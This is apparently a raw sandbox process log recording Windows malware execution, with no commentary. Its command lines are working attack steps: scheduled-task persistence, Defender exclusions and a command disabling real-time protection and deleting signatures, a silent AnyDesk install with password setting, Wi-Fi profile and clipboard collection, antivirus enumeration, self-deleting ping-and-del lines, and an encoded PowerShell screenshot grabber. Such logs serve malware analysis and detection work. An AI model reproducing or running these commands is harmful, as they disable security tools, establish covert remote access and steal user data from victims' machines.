C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Local\Temp\a\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe

"C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JpsXGIQt8bGP.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe

"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\explorer.exe

explorer.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SYSTEM32\msiexec.exe

msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe

"C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe"

C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe

"C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe"

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DbsVCvDMFD4m.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5128 -ip 5128

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 1324

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\leto.exe

"C:\Users\Admin\AppData\Local\Temp\a\leto.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe

C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe

"C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe

C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe

"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe

C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe

"C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe"

C:\Users\Admin\AppData\Local\Temp\a\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\a\laz.exe

"C:\Users\Admin\AppData\Local\Temp\a\laz.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1336.tmp\1337.tmp\1338.bat C:\Users\Admin\AppData\Local\Temp\a\laz.exe"

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-service

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-control

C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe

"C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2972 -ip 2972

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 1268

C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe

"C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\64F0.tmp\64F1.tmp\64F2.bat C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"

C:\Users\Admin\AppData\Roaming\AnyDesk.exe

C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent

C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe"

C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe"

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service

C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3184 -ip 3184

C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 404

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"

C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe

"C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe"

C:\Users\Admin\AppData\Local\Temp\a\srtware.exe

"C:\Users\Admin\AppData\Local\Temp\a\srtware.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3184 -ip 3184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 412

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6780 -ip 6780

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe

"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 84

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Users\Admin\AppData\Local\Temp\a\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"

C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe

"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe

"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe

"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Users\Admin\AppData\Local\complacence\outvaunts.exe

"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3cpcjorb\3cpcjorb.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES198B.tmp" "c:\Users\Admin\AppData\Local\Temp\3cpcjorb\CSCBCEC958DCFB740CF86BBF5429A6D15CB.TMP"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5300 -ip 5300

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 7428 -ip 7428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5300 -s 1288

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

